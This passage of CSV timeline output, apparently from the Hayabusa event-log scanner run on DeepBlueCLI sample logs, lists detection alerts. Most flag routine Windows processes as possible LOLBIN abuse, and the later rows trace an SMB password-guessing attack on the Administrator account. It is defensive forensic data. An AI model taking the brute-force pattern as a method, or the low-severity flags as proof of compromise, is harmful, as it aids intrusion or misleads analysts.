IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 
Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.164 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 
0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | Computer: 6hgtmVlrrFuWtO65 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_NonexistantUser.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gC4ymsKbxVGScMgY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.513 +09:00,-,-,medium,CredAccess,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW_PW-Guessing_Count.yml,- 
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2q1tdAUlxHGfGH6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3EPNzcwy7tOAADWx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AbwsMP10Rs4h1Wl1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EEcdqcpqsxQ4RgPx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ngdtRwzXXhAlRxGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BbCFZw5qQgU7rQ9W | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SXr7lA3MkV6xK36f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tVFs1kR0AuOutnuI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PkeEabFrDLsBVcXi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GH7dTevmTKZo46Tq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l2E8JmrfaCj5AjSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: N4FLUvawWPVqdLaD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KN0EeUzxSZy5l7J4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: l8FjH0QHqromIYWf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fhlF37S1wNupiX5O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j19XhmSXK526I8kf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:07.297 